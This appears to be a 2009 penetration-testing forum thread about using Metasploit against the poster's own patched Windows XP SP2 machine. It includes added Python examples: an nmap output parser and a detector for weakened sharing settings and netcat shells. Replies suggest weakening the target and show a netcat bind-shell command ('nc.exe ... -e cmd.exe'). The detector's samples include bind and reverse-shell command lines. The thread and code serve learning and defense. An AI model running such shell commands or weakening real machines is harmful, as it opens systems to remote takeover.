Hello, this is my first post on the Remote Exploit forums, but I have a moderate amount of experience with Linux and I have been learning about BackTrack for about a week now. I've learned quite a lot about decrypting WEP keys, and just how simple it is. After I realized just how insecure WEP is, I changed my network encryption to a 63-character WPA2 key with AES and TKIP. Since my wireless network is now mostly secure, I don't think I have to worry about anyone using my internet connection, but I would like to learn how to exploit a Windows Machine that I own. The system that I am trying to gain access to using metasploit is owned by me. I am doing this for educational purposes only, and I was wondering if you guys could help me learn how to gain access to the computer using metasploit. I have read a bit about how the exploits are done, but I haven't been able to figure out how to get MetaSploit to work. Here are some details about my configuration:
* The (home) network I am on is owned by me. The access point is called "YNXA7". It is encrypted wirelessly using WPA2 and a 63-character key generated from GRC.
* The computer I am attempting to run the exploit from is connected to the network wirelessly, and is given the IP address of 192.168.1.2 by DHCP.
* The computer which I am testing for vulnerability to exploits is on the IP address of 192.168.1.3, and it is running Windows XP SP2. It has few programs installed except for the default software and McAfee Total Protection. All Windows Updates have been installed.
* The name of the Windows workgroup is "WORKGROUP", and because the machine is intended to be the target of the attack, I set its network name to VICTIM.home
After running nmap on the computer using nmap -sU 192.168.1.3, here is the output I get:
Starting Nmap 4.60 ( hxxp:\\nmap.org ) at 2009-01-26 18:55 GMT
Interesting ports on VICTIM.home (192.168.1.3):
Not shown: 1482 closed ports
PORT STATE SERVICE
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1900/udp open|filtered UPnP
4500/udp open|filtered sae-urn
MAC Address: 00:16:6F:68:A0:6E (Intel)
Nmap done: 1 IP address (1 host up) scanned in 6.502 seconds
I have MetaSploit 3 running on the computer that I have backtrack on at the default web address of hxxp:\\127.0.0.1:55555, and I have unsuccessfully tried a MSRPC exploit. Sorry for the weird URL formatting but I'm not allowed to post URLs yet.
Could anyone help me figure out how it would be possible to exploit this computer?
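Added here as an illustration, not part of the original post: a small Python parser for the nmap normal-output format pasted above, followed by an assessment of what that output does and does not establish. The scan text is the one from the post; the parser and the `assess` helper are assumptions of this example, not nmap's own code.

```python
import re
from dataclasses import dataclass, field

# Nmap output exactly as posted above (UDP-only scan of 192.168.1.3).
NMAP_OUTPUT = r"""Starting Nmap 4.60 ( hxxp:\\nmap.org ) at 2009-01-26 18:55 GMT
Interesting ports on VICTIM.home (192.168.1.3):
Not shown: 1482 closed ports
PORT STATE SERVICE
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1900/udp open|filtered UPnP
4500/udp open|filtered sae-urn
MAC Address: 00:16:6F:68:A0:6E (Intel)
Nmap done: 1 IP address (1 host up) scanned in 6.502 seconds
"""


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str


@dataclass
class ScanResult:
    host: str = ""
    ip: str = ""
    mac: str = ""
    vendor: str = ""
    not_shown: dict = field(default_factory=dict)   # e.g. {"closed": 1482}
    ports: list = field(default_factory=list)


HOST_RE = re.compile(r"^Interesting ports on (\S+) \(([\d.]+)\):")
NOT_SHOWN_RE = re.compile(r"^Not shown: (\d+) (\S+) ports")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+([\w|]+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17})(?: \(([^)]*)\))?", re.I)


def parse_nmap(text: str) -> ScanResult:
    """Parse nmap 'normal' output (the human-readable form) into a ScanResult."""
    result = ScanResult()
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            result.host, result.ip = m.group(1), m.group(2)
            continue
        m = NOT_SHOWN_RE.match(line)
        if m:
            result.not_shown[m.group(2)] = int(m.group(1))
            continue
        m = PORT_RE.match(line)
        if m:
            result.ports.append(Port(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
            continue
        m = MAC_RE.match(line)
        if m:
            result.mac, result.vendor = m.group(1), m.group(2) or ""
    return result


def assess(result: ScanResult) -> dict:
    """Say what the scan proves: which protocols were probed and which ports are really confirmed."""
    protocols = sorted({p.proto for p in result.ports})
    confirmed_open = [f"{p.number}/{p.proto}" for p in result.ports if p.state == "open"]
    ambiguous = [f"{p.number}/{p.proto}" for p in result.ports if p.state == "open|filtered"]
    findings = []
    if "tcp" not in protocols:
        findings.append("only UDP ports appear in the output: TCP services were never probed")
    if ambiguous:
        # open|filtered means no datagram came back at all, so nmap cannot tell an
        # open UDP service from a host firewall silently dropping the probe.
        findings.append(f"{len(ambiguous)} port(s) are open|filtered, i.e. unanswered, not confirmed open")
    return {
        "protocols": protocols,
        "confirmed_open": confirmed_open,
        "ambiguous": ambiguous,
        "findings": findings,
    }


if __name__ == "__main__":
    scan = parse_nmap(NMAP_OUTPUT)
    print(f"{scan.host} ({scan.ip}) MAC {scan.mac} [{scan.vendor}]")
    for f in assess(scan)["findings"]:
        print(" -", f)
```

Run as-is it prints the host line and two findings: the output contains no TCP information, and every listed UDP port is `open|filtered` rather than `open`, so the scan by itself confirms no listening service.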
Metasploit doesn't have everything. Try going to milw0rm.com
> All Windows Updates have been installed.
This is your problem. Try finding some vulnerable software exploits from Metasploit and add them to your XP machine (FTP, SMTP, IMAP, etc). Or you can try initiating client-side attacks through email or IE.
I have had this issue as well. When you review targets under BackTrack, most of the targets are 2k, XP SP1 machines. Being that it is not possible in my knowledge to downgrade from SP2 to 1, this makes testing difficult for me. In addition, I have never had success downloading updates to BT, however that is to be expected, as I have never successfully installed a version of BT to a computer. (I was so close!)
"You're only smoke and mirrors..."
Let me see if I understand this. You have a FULLY patched XP SP2 box and you want to exploit it using metasploit (i.e. publicly available exploits)?
If it is FULLY patched, then generally speaking, no public exploits should work (there may be some that could work given some kind of specific set up). But in general, if it is fully patched, you either need some kind of misconfiguration or a 0-day exploit.
You could change the group policy to allow "classic" network logins. That will open up the potential for some SMB type attacks. Go to Administrative Tools > Local Security Policy > Security Options and change "Network access: Sharing and security model for local accounts" from Guest Only to Classic.
Now you can login remotely using one of the local accounts (such as administrator). You will also need to set an administrator password.
Good Luck...
Metasploit is nice for doing a quick and dirty test, but if you want to get into a machine, often Metasploit's automatic exploitation isn't working the way you want it to.
The best would be to learn how exploits work, how to find them and how to write/modify exploits.
As said before, if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine opening something (email/website/playlist...).
Tiocfaidh ár lá
I agree. And an excellent playground when starting out learning how exploits work is PwnOS, which can be downloaded from http://forums.heorot.net/.
-Monkeys are like nature's humans.
cat /pentest/exploits/milw0rm/sploitlist.txt | grep XP
But as stated by others, your problem probably lies in the fact that you have fully patched your machine, so if you have a fully isolated network then uninstall/remove the patches.
open source = open minds, human knowledge belongs to the world
> As said before, if the machine is fully patched you can most likely just do attacks which involve someone on the victim machine opening something (email/website/playlist...).
Search this forum for a title with "Metasploiting for BT3 - Reverse TCP", select the first one by phoenix910. I would download the pdf file (link can be found inside the description).
This tut is an excellent piece of work, a very helpful write-up with a friendly approach. And it works perfectly... I checked on the BT3 platform. Works fine no matter whether the victim is Vista/XP, firewall on/off... :-)
Hi,
If you are looking for practicing Metasploit, then as suggested by other members, you need to have some vulnerability on your XP SP2 machine.
The first thing which I don't understand on your part is why you did only UDP scanning of the target machine (-sU)? You should have scanned TCP as well.
Anyway, for practicing Metasploit, look out for the netcat NT 1.10 version. It's vulnerable when you run it as follows:
# nc.exe -v -L -p 8080 -e cmd.exe
v: verbose
L: listen harder i.e. even after disconnecting once it should get ready for listening again
p: port to listen on
e: program to execute
With the NT 1.10 version, -e is the vulnerable part. Metasploit has an exploit for it.
You may need to either shut off your firewall or allow an exception for port 8080, or you may go for a reverse connect from XP SP2 to your attacking machine.
From here onwards I can spoon-feed you for both scenarios, but it's better you look on your own for these two conditions.
Let us know if you get stuck at any point, but we expect you to Google 10 times before you ask something here.
rgds
fr0zen sm0ke
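Two of the replies above describe deliberately weakening the XP box: switching "Network access: Sharing and security model for local accounts" from Guest only to Classic, and running netcat with `-e cmd.exe` as a listener (or as a reverse connect). The following Python is an added example from the defender's side, not code from any poster: it audits for both conditions. The registry export text and the process command lines are constructed samples; the `ForceGuest` value under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` is the real backing store of that policy (1 = Guest only, 0 = Classic), and the helper names are this example's own.

```python
import re
import shlex
from typing import Optional

# --- Part 1: which sharing/security model is configured? ---
# Constructed `reg export` text for HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
# ForceGuest is the DWORD behind "Network access: Sharing and security model
# for local accounts": 0 = Classic (the weakening suggested in the thread), 1 = Guest only.
REG_EXPORT_CLASSIC = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000000
"""
REG_EXPORT_GUEST_ONLY = REG_EXPORT_CLASSIC.replace("dword:00000000", "dword:00000001")

FORCEGUEST_RE = re.compile(r'^"forceguest"=dword:([0-9a-f]{8})$', re.I | re.M)


def sharing_model(reg_export: str) -> Optional[str]:
    """Return 'Classic', 'Guest only', or None if the value is absent/unrecognised."""
    m = FORCEGUEST_RE.search(reg_export)
    if not m:
        return None
    return {0: "Classic", 1: "Guest only"}.get(int(m.group(1), 16))


# --- Part 2: is netcat running with a program attached to the socket? ---
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}

# Constructed process command lines, as a process-creation log might record them.
SAMPLE_CMDLINES = [
    r"C:\tools\nc.exe -v -L -p 8080 -e cmd.exe",          # bind listener (as in the post)
    r"C:\WINDOWS\system32\svchost.exe -k netsvcs",        # ordinary service host
    r"nc.exe -v -z 192.168.1.2 80",                       # netcat used only as a port probe
    r"C:\tools\nc.exe 192.168.1.2 4444 -e cmd.exe",       # reverse connect variant
]


def classify_netcat(cmdline: str) -> Optional[dict]:
    """Return a finding when the command line is netcat started with -e, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)   # non-POSIX: keep Windows paths intact
    except ValueError:
        return None
    if not argv:
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    listen, program, port, positional = False, None, None, []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            for ch in tok[1:]:                      # handles combined flags such as -vL
                if ch in "lL":
                    listen = True
                elif ch == "p" and i + 1 < len(argv):
                    i += 1
                    port = argv[i]
                elif ch == "e" and i + 1 < len(argv):
                    i += 1
                    program = argv[i]
        else:
            positional.append(tok)
        i += 1
    if program is None:
        return None                                  # no -e: not a shell-over-socket use
    if listen:
        kind = "bind"
    else:
        kind = "reverse"
        if port is None and len(positional) >= 2:
            port = positional[1]                     # host port given positionally
    return {"kind": kind, "program": program, "port": port, "cmdline": cmdline}


def audit_process_log(cmdlines) -> list:
    """Run classify_netcat over every recorded command line and keep the hits."""
    return [f for f in (classify_netcat(c) for c in cmdlines) if f]


if __name__ == "__main__":
    print("sharing model:", sharing_model(REG_EXPORT_CLASSIC))
    for f in audit_process_log(SAMPLE_CMDLINES):
        print(f"netcat {f['kind']} shell -> {f['program']} on port {f['port']}: {f['cmdline']}")
```

On a real host the export text would come from `reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa` and the command lines from whatever process-creation logging is in place; the classifier deliberately ignores netcat used without `-e` (such as the port-probe line) so that only the shell-over-socket pattern is reported.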